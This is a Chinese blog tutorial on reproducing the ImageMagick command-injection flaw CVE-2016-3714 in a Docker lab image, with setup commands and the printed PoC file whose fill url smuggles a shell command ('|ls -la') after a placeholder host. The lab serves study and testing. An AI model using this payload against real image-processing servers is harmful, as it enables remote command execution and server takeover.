体验ImageMagick 命令执行漏洞(CVE-2016–3714)的PoC

最新推荐文章于 2024-10-12 17:07:47 发布
最新推荐文章于 2024-10-12 17:07:47 发布
阅读量3.4k 收藏 1
点赞数
分类专栏: docker 安全 文章标签: imagemagick 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/52481352
版权

首先安装好docker

环境地址

GitHub地址:
https://github.com/Medicean/VulApps
镜像地址:
https://hub.docker.com/r/medicean/vulapps/
镜像的各种Tag:
https://hub.docker.com/r/medicean/vulapps/tags/
这里写图片描述

环境搭建

获取镜像

$ docker pull medicean/vulapps:i_imagemagick_1

其中,medicean/vulapps是镜像名,后面冒号接具体的Tag

运行镜像

$ docker run -d -p 8000:80 --name=i_imagemagick_1 medicean/vulapps:i_imagemagick_1
  • run命令是create命令和start命令的结合。类似git的pull命令是fetchmerge命令的结合。
  • -d 表示daemon,作为后台守护进程运行。
  • -p 表示port8000:80前者为默认的本地(127.0.0.1)端口,后者为镜像的端口。
  • –name=i_imagemagick_1 ,显式指定容器(Container)的名字,虽然不显式指定,docker也会帮你指定一个名字(细心的可以发现docker指定的名字还蛮有意思的:) )。

然后

$ docker ps -a

显示所有的docker容器,以及它们的状态。
容器运行起来之后,使用

$ docker exec i_imagemagick_1 cat /poc.png

命令让指定的容器执行指定的命令
这里是指定了i_imagemagick_1这个容器(也可以用它的完整Id或者前4位数字代替),打印出根目录的poc.png文件的内容

$ cat /poc.png
push graphic-context
viewbox 0 0 640 480
fill 'url(https://evalbug.com/"|ls -la")'
pop graphic-context

这个/poc.png就是PoC!
当在容器shell里执行时

$ convert /poc.png 1.png

或通过物理机执行

$ docker exec i_imagemagick_1 convert /poc.png 1.png

漏洞触发。
搭建好环境之后访问127.0.0.1:8000。这里8000映射了镜像里的80端口,用于HTTP访问具体的说明信息,文件位于/var/www/html/index.php
这里写图片描述

漏洞利用

这里写图片描述

后门——poc.php

进入容器的交互式shell

$ docker run -t -i medicean/vulapps:i_imagemagick_1  "/bin/bash"

之后,查看poc.php
位于/var/www/html/poc.php
这里写图片描述

利用——poc.py

https://github.com/Medicean/VulApps/blob/master/i/imagemagick/1/poc.py

附录

Docker环境搭建:
https://docs.docker.com/engine/installation
Docker中文指南:
http://www.heblug.org/chinese_docker/userguide/dockerizing.html

caiqiiqi
关注
专栏目录
深入浅析ImageMagick命令执行漏洞
12-23
00 前言 什么是ImageMagickImageMagick是一个功能强大的开源图形处理软件,可以用来读、写和处理超过90种的图片文件,包括流行的JPEG、GIF、 PNG、PDF以及PhotoCD等格式。使用它可以对图片进行切割、旋转、组合等多种特效的处理。 由于其功能强大、性能较好,并且对很多语言都有拓展支持,所以在程序开发中被广泛使用。许多网站开发者喜爱使用ImageMagick拓展来做web上的图片处理工作,比如用户头像生成、图片编辑等。 01 漏洞描述 ImageMagick是一款开源图片处理库,支持PHP、Ruby、NodeJS和Python等多种语言,使用非常广泛。包括PH
ImageMagick命令执行漏洞(CVE-20163714)利用及测试
weixin_30788731的博客
07-27 387
  ImageMagick命令执行漏洞(CVE-20163714) 5月3日,ImageMagick官方披露称,目前ImageMagick存在一处远程命令执行漏洞CVE-20163714),当其处理的上传图片带有攻击代码时,可被远程执行任意代码,进而导致攻击者控制服务器。 ImageMagick是一款开源图片处理库,支持PHP、Ruby、Node...
JDWP调试接口RCE漏洞介绍(端口不对公网开放)
最新发布
XT4625的专栏
10-12 1070
JDWP是为Java调试而设计的通讯交互协议,在渗透测试的过程中,如果遇到目标开启了JDWP服务,就可以利用JDWP实现远程代码执行JDWP(Java Debug Wire Protocol,Java调试线协议)是一个为Java调试而设计的通讯交互协议,它定义了调试器(Debugger)和被调试JVM(Debuggee)进程之间的交互数据的传递格式,它详细完整地定义了请求命令、回应数据和错误代码,保证了调试端和被调试端之间通信通畅。
Imagemagick 命令注入漏洞 (CVE-20163714)
zzzzz1284的博客
01-09 269
CVE-20163714复现
ImageMagick 命令执行漏洞
mirror97black的博客
12-20 2445
ImageMagick 命令执行漏洞
ImageMagick
$firecat利白的代码足迹$
12-02 366
使用ImageMagick的创建,编辑,撰写,或转换位图图像。它可以读取和写入各种格式(超过200种)的图像,包括PNG,JPEG,GIF,HEIC,TIFF,DPX,EXR,WebP,Postscript,PDF和SVG。使用ImageMagick可以调整图像大小,翻转,镜像,旋转,变形,剪切和变换图像,调整图像颜色,应用各种特殊效果或绘制文本,线条,多边形,椭圆和贝塞尔曲线。 ImageMa...
Vulhub - Imagetragick 命令执行漏洞CVE-20163714
多崎巡礼的博客
12-20 1390
金盾第一天居然是复现漏洞唉。。。 安装docker等等 1.安装docker wget https://apt.dockerproject.org/repo/pool/main/d/docker-engine/docker-engine_17.05.0~ce-0~debian-jessie_amd64.deb dpkg -i docker-engine_17.05.0~ce-0~debian-j...
利用Vulnhub复现漏洞 - Imagetragick 命令执行漏洞CVE-20163714
JiangBuLiu的博客
07-10 1925
Imagetragick 命令执行漏洞CVE-20163714)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现端口设置浏览器设置BurpSuit设置上传POC反弹shell POC Vulnhub官方复现教程 https://github.com/vulhub/vulhub/blob/master/imagemagick/imagetragick/README.zh-cn.md 漏...
命令执行漏洞CVE-2016-5734分析
willow_liang的博客
10-17 908
命令执行漏洞 背景 程序员使用脚本语言(比如PHP)开发应用程序过程中,脚本语言开发十分快速、简洁,方便,但是也伴随着一-些问题。比如说速度慢,或者无法接触系统底层,如果我们开发的应用,特别是企业级的一些应用需要去调用一-些外部程序。当应用需要调用- - -些外部程序时就会用到一-些执行系统命令的函数。 命令执行漏洞原理 命令执行漏洞(Command Execution)是指应用有时需要调用一些执行系统命令的函数,如: system()、 exec()、shell exec()、 eval()、 pass
Gitlab 任意文件读取漏洞CVE-2016-9086)和漏洞CVE-2018-19475)
m0_53603468的博客
12-25 821
文章目录一、概述**任意文件读取漏洞**二、漏洞复现 一、概述 Gitlab 任意文件读取漏洞CVE-2016-9086) 影响版本Gitlab版本:8.13.1之前 GitLab是由GitLabInc.开发,使用MIT许可证的基于网络的Git仓库管理工具,且具有wiki和issue跟踪功能。使用Git作为代码管理工具,并在此基础上搭建起来的web服务。 GitLab由乌克兰程序员DmitriyZaporozhets和ValerySizov开发,它使用Ruby语言写成。后来,一些部分用Go语言重写。截止
[ vulhub漏洞复现篇 ] ImageMagick 任意文件读取漏洞 (CVE-2022-44268)
qq_51577576的博客
03-13 1107
[ vulhub漏洞复现篇 ] ImageMagick 任意文件读取漏洞 (CVE-2022-44268) 在ImageMagick 7.1.0-51版本及以前存在CVE-2022-44268漏洞ImageMagick 7.1.0-49 容易受到信息泄露的攻击。当它解析PNG图像(例如,调整大小)时,生成的图像可能嵌入了任意远程文件的内容(如果ImageMagick二进制文件有权读取它)。
CVE-POC:CVE的一些POC
05-11
CVE-POC CNVD-2021-10543 MessageSolution 企业邮件归档管理系统 EEA 存在信息泄露漏洞 CVE-2020-1938 Apache Tomcat文件包含漏洞
ImageMagic[0day]漏洞扫描器
09-13
ImageMagic爆发0day漏洞,该工具用来检测
CVE-2021-26855-PoC:CVE-2021-26855的PoC攻击代码
03-12
CVE-2021-26855-PoC CVE-2021-26855的PoC漏洞利用代码。 原始代码由开发。 CVE-2021-26855 SSRF简单地使用Golang练习受影响的版本 Exchange Server 2013 is less than CU23 Exchange Server 2016 is less than CU18 Exchange Server 2019 is less than CU7 使用条件 此漏洞与以前的交换漏洞不同。 此漏洞不需要可以登录的用户身份。它可以在未经授权的情况下获取内部用户资源。 它可以与CVE-2021-27065一起使用以实现远程命令执行漏洞触发要求 Vulnerability in the target server The target exchange server must be a load balancing se
OpenSSH用户枚举漏洞pocCVE-2018-15473)
08-24
OpenSSH用户枚举漏洞pocCVE-2018-15473),通过poc可以直接检查目标服务器是否存在此漏洞,通过检查漏洞,来及早发现漏洞,打上补丁
ImageMagick被爆高危漏洞
php小松
09-04 996
昨天收到阿里云的漏洞报告邮件,邮件内容 ImageMagick被爆高危漏洞(CVE-2016-3714),此漏洞允许攻击者通过上传恶意构造的图像文件,在目标服务器执行任意代码。黑客可利用此类漏洞盗取权限窃取数据。由于ImageMagick应用十分广泛,目前已确定Wordpress等知名应用受此漏洞影响。 影响范围:  ImageMagick 当时没有在意,今天早上有收到百度发过来的邮件才开始注
ImageMagick命令执行漏洞
weixin_33963594的博客
05-06 167
这两天刚爆的ImageMagick命令执行漏洞比较火。 影响版本范围 ImageMagick 6.5.7-8 2012-08-17(手工测试风险存在)ImageMagick 6.7.7-10 2014-03-06(手工测试风险存在)低版本至6.9.3-9 released 2016-04-30 漏洞分析:http://bobao.360....
ImageMagick命令注入漏洞(CVE-20163714)
HEAVEN569的博客
06-28 1196
震惊!!看图片也能中招!
Imagetragick 命令执行漏洞CVE-20163714
weixin_30376453的博客
07-25 396
Imagetragick介绍: ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。但近来有研究者发现,当用户传入一个包含『畸形内容』的图片的时候,就有可能触发命令注入漏洞命令执行漏洞是出在 ImageMagick 对 https 形式的文件处理的过程中。 ImageMagick 之所以支...
CVE-2016-8707
09-03
CVE-2016-8707是一种安全漏洞,具体详情需要通过查看相关链接来获取更多信息。此链接提供了下载ImageMagick软件的rpm文件和安装的命令。安装过程中需要先安装ImageMagick-libs-7.0.10-29.x86_64.rpm,然后再安装...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值